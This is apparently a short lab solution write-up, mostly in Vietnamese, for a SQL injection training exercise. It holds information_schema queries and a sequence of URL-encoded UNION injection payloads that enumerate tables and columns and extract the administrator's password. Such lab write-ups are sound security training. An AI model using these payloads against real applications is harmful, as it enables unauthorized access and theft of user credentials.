Lab: SQL injection attack, listing the database contents on non-Oracle databases
Last updated
Last updated
Phòng thí nghiệm này chứa lỗ hổng SQL injection trong bộ lọc danh mục sản phẩm. Kết quả từ truy vấn được trả về trong phản hồi của ứng dụng để bạn có thể sử dụng tấn công UNION để truy xuất dữ liệu từ các bảng khác.
Ứng dụng có chức năng đăng nhập và cơ sở dữ liệu chứa một bảng lưu trữ tên người dùng và mật khẩu. Cần xác định tên của bảng này và các cột mà nó chứa, sau đó truy xuất nội dung của bảng để lấy tên người dùng và mật khẩu của tất cả người dùng.
Mục tiêu: Đăng nhập với tư cách người dùng administrator
SELECT * FROM information_schema.tables
Truy vấn trả về các trường
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
Truy vấn trả về các trường
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME COLUMN_NAME DATA_TYPE
'+ORDER+BY+2--+
'+UNION+SELECT+'a','a'--+
'+UNION+SELECT+TABLE_NAME,NULL+FROM+information_schema.tables--+
'+UNION+SELECT+COLUMN_NAME,DATA_TYPE+FROM+information_schema.columns+WHERE+table_name+%3d+'users_rxppko'--+
'+UNION+SELECT+password_hqawdf,email+FROM+users_rxppko+WHERE+username_cdpeli+%3d+'administrator'--+